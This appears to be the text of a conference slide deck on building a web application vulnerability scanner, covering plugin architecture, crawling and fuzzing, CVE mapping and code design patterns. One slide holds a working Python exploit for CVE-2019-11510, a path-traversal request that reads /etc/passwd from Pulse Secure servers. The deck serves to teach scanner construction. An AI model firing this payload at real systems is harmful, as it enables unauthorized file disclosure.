This document discusses building a high performance web application vulnerability scanner. It begins with an introduction of the speaker and agenda. It then defines what a WAVS is and why they are needed for both penetration testers and businesses to discover vulnerabilities. The document discusses why building your own WAVS is typically not recommended and reviews common challenges. It proposes an architecture with core and plugin components and discusses approaches like crawling and fuzzing, CPE and CVE mapping, and public exploit testing. Recommendations are provided around programming languages, code design patterns, and challenges like JavaScript crawling, high overhead, false positives, and other considerations.
5. Web Application Vulnerability Scanners are
automated tools that scan web applications, normally
from the outside, to look for security vulnerabilities
such as Cross-site scripting, SQL Injection, Command
Injection, Path Traversal and insecure server
configuration
7. › Discover attack surfaces (URLs, headers, open
ports)
› Gather information about the target (OS, Web
frameworks, built-in technologies, sitemap)
› Detect non-business logic vulnerabilities (SQLi, XSS,
SSTi)
› Detect misconfigurations
For pentesters
8. › Get similar advantages as pentesters get
› See an overview of security risks in web applications
› Integrate findings into vulnerability management
› Save cost against basic security flaws
For businesses
10. NO
Except you do it due to educational purposes or clear
commercial purposes
11. › User doesn’t like the way scanner X implements a feature
› User has free time
› User starts writing his own scanner and usually succeeds in implementing the one
feature he really needed
› The new web application scanner only works on a small subset of sites, since it doesn’t
know how to extract links other than the ones in tags, or can’t handle broken HTML, or is
too slow to be used on any site with more than a few hundred pages.
› The creator of the new tool maintains it for six months
› The project dies when the project lead finds more interesting things to do, finds a tool
that did what he needed, changes jobs, etc.
The usual timeline
13. Security testing in the wild
Discovery
Vulnerability
Analysis
Exploitation
Follow the tactical exploitation
14. Security testing in the wild
Discovery
Vulnerability
Analysis
Exploitation
This is the process for discovering as much
background information about the target as
possible including, hosts, operating systems,
topology, etc.
15. Security testing in the wild
Discovery
Vulnerability
Analysis
Exploitation
Vulnerability analysis is the process of
discovering flaws in systems and applications
which can be leveraged by an attacker.
16. Security testing in the wild
Discovery
Vulnerability
Analysis
Exploitation
The exploitation focuses solely on establishing
access to a system or resource by bypassing
security restrictions.
17. › Scalability: Adding new vulnerability signatures
easily
› Stability: Taking up less RAM and CPU
› Reliability: Finding vulnerabilities with low false
positive
Requirements
19. Architecture
Core Plugins
Apply the plugin-based architecture
Core
› Manages the main flow
› Coordinates the processes, threads
› Provides APIs to resuse by plugins
Plugins
› Find flaws directly
› Get data from the core
› Share information gathered for other components/plugins via the core apis
20. Plugins
› Infrastructure: Gather all information about the target such as sitemap, headers, OS,
web framework, etc. It runs in a loop which the output of one discovery plugin is sent
as input to the next plugin
› Subdomain: Find all sub-domains from the root domain
› Audit: Take the output of discovery plugins and find vulnerabilities by fuzzing
› Attack: Try to exploit by using confirmed finding from audit plugins
› Other plugins: Output, mangle, evasion, grep, brute force
23. Crawling and Fuzzing
› The main component is a crawler
› The crawler gets the seed URL and finds all possible URLs of the target
Seed URL
Requester
Parse
Document
HTTP Response
URL Queue
The URL is not in the queue
URL
Pack
The URL is in the queue?
Fuzzable
Request
25. Crawling and Fuzzing
› Normally use for finding 0-day vulnerabilities or common vulnerabilities (SQLi, XSS,
etc)
› Complex to implement a new plugin
› Take high rate of false positives
26. CPE and CVE mapping
› Detect the name and version of all possible technologies, frameworks of the target
› Convert findings to CPEs (Common Platform Enumeration) strings
› CPE is a structured naming scheme for information technology systems, software,
and packages.
› Find CVEs map with those CPEs
cpe:2.3:o:linux:linux_kernel:2.6.0:*:*:*:*:*:*:*
cpe:/o:linux:linux_kernel:2.6.0
27. CPE and CVE mapping
› Sometimes, converting name and version to CPE format is impossible
› Building your own threat intelligence or vulnerability DB is required
28. Public exploits tesing
› As know as blind testing
› Run known exploit code with your target. If the response matches the signature, the
target is vulnerable
› Detecting technologies is not really necessary
29. Public exploits tesing
› Normally use for finding 1-day vulnerabilities, CVEs, known and public exploits for
specific applications or frameworks
› Easy to implement a new plugin
› Take low rate of false positives
30. Public exploits tesing
class Cve201911510(AttackPlugin):
def __init__(self):
super().__init__()
self.path = '/dana-na'
self.payload = self.generate_payload()
def generate_payload(self, file_name=''):
if file_name == '':
file_name = '/etc/passwd'
payload = f'/../dana/html5acc/guacamole/../../../../../../..{fil
e_name}?/dana/html5acc/guacamole/'
return payload
def real_exploit(self, url):
resp = self.requester.get(url + self.payload, path_as_is=True)
if 'root:x:0' in resp.text:
return True
return False
32. Program languages
› The main language depends on the environment that the scanner is installed
› If the scanner is distributed as a desktop app, it should be written in low-level
language to protect against reverse engineering. Python is a bad choice.
› If the scanner is delivered as a service, the language is not a problem
› The core can be written in any program languages
› The plugins should be written in scripting languages such as python, LUA, or even
your own language for scalability
33. Code design
› Design pattern is very important if you’d like to scale up the scanner
class CoreStrategy(object):
def start(self):
try:
target = self._core.base_target
if not target.is_valid():
logger.error('The target is not valid')
return
if target.get_type() == TYPE_URL:
self.discover()
self.attack()
self.audit()
else:
self.discover()
self.attack()
except ScanMustStopException:
logger.error('[!] The scan will be finished now')
except:
logger.error()
Strategy Pattern
34. Code design
› Design pattern is very important if you’d like to scale up the scanner
def real_exploit(self, url):
"""
This method MUST be implemented on every plugin.
:param url: url to test whether it can be exploited or not
:return: True if it is vulnerable. Otherwise, false.
"""
msg = 'Plugin is not implementing required method real_exploit'
raise NotImplementException(msg)
Abstract Pattern
35. Code design
› Design pattern is very important if you’d like to scale up the scanner
def real_exploit(self, url):
"""
This method MUST be implemented on every plugin.
:param url: url to test whether it can be exploited or not
:return: True if it is vulnerable. Otherwise, false.
"""
msg = 'Plugin is not implementing required method real_exploit'
raise NotImplementException(msg)
Abstract Pattern
36. Code design
› Design pattern is very important if you’d like to scale up the scanner
def factory(module_name, *args):
"""
This function creates an instance of a class that's inside a module
with the same name.
Example :
>> cve_2015_4852 = factory( 'exploits.plugins.attack.cve_2015_4852' )
>> cve_2015_4852.get_name()
>> 'CVE-2015-4852'
:param module_name: Which plugin do you need?
:return: An instance.
"""
Factory Pattern
38. › The traditional crawler does not work with JS-based website
or single page application (Angular, VueJS, React)
Javascript crawling
39. › Available solutions: Using headless browsers to render JS
at the client side (Chronium, Firefox, PhantomJS, Splash, etc)
› Cons: Those engines take up a lot of computer resources
(RAM, CPU) and the rendering speed is slow
Javascript crawling
40. › Scanners normally take a lot of
› I/O resources since performing many requests to outside
› CPU since it has to be analyzed continuously
› RAM since using multi-thread design or forgetting to free
unnecessary memory
High overhead
44. › Many web applications handle requests not in the way we
expect (e.g return status code 200 for not found pages)
› Delay in connections
› The web content includes vulnerability signatures
False positives
46. › Identify the appropriate form field (email, phone, name, city)
› Authenticate the target
› Crawl and fuzz APIs
› Deal with business logic vulnerabilities
Others